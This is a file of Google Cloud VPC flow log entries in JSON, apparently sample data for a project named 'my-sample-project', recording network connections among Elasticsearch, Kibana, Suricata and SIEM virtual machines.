+{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"67.43.156.13","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.168.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"67.43.156.13","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"67.43.156.13","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"67.43.156.13","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.168.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 